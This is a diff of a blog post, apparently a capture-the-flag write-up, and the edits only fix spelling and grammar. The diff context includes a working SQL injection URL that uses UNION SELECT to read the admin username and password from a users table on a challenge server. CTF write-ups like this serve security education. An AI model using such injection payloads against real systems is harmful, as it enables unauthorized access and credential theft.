Kontowicz/Kontowicz.github.io/_posts/2020-09-14-live-instance.md

 ![Flag](assets/live_instance/flag1/flag.png)

-and I was right, flag is admin passwod.
+and I was right, the flag is admin password.

 ```
 http://34.74.105.127/74d469a935/ticket?id=111%20union%20select%20username,password,%271%27%20from%20users%20where%20username=%27admin%27;select%20%271
 ```

-That query used to read flag.
+That query used to read the flag.